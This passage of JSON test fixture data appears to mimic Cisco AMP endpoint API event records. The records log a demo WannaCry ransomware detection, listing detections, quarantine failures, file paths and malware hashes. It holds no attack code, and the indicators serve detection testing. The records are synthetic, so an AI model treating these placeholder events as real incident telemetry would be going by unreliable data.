Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":754000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867975","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867974","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":568000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835282","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":537000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835281","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":537000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835280","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":100000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 